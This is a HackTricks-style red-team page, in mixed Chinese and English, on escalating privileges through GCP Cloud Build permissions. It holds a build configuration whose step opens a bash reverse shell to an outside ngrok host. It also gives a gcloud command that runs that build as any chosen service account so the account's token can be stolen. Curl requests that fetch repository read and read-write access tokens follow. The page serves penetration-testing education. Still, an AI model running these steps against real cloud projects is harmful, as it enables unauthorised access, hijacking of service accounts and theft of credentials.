GCP - Cloudbuild Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

cloudbuild

欲了解有关 Cloud Build 的更多信息,请查看:

GCP - Cloud Build Enum

cloudbuild.builds.create, iam.serviceAccounts.actAs

拥有此权限,你可以submit a cloud build。cloudbuild 机器在其文件系统中默认会包含default a token of the cloudbuild Service Account<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com。然而,你可以在 cloudbuild 配置中indicate any service account inside the project
因此,你可以让该机器将 token exfiltrate 到你的服务器,或是在其中get a reverse shell inside of it and get yourself the token(包含 token 的文件可能会变动)。

通过 gcloud CLI 的直接利用

1- 创建 cloudbuild.yaml 并用你的 listener data 修改它

Cloud Build YAML configuration for reverse shell ```yaml steps: - name: bash script: | #!/usr/bin/env bash bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 options: logging: CLOUD_LOGGING_ONLY ```

2- 上传一个不包含源代码的简单 build,包含 yaml 文件,并指定在构建中使用的 SA:

使用指定服务账号提交 Cloud Build ```bash gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com ```

使用 python gcloud 库

You can find the original exploit script here on GitHub (but the location it’s taking the token from didn’t work for me). Therefore, check a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to get a reverse shell inside the cloudbuild machine and steal it here (in the code you can find how to specify other service accounts).

For a more in-depth explanation, visit https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

cloudbuild.repositories.accessReadToken

With this permission the user can get the read access token used to access the repository:

获取用于访问 repository 的 read access token ```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken" ```

cloudbuild.repositories.accessReadWriteToken

拥有此权限的用户可以获取用于访问仓库的读写访问令牌

获取仓库的读写访问令牌 ```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadWriteToken" ```

cloudbuild.connections.fetchLinkableRepositories

拥有此权限可以获取该连接有权访问的仓库:

获取可关联的仓库 ```bash curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories" ```

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks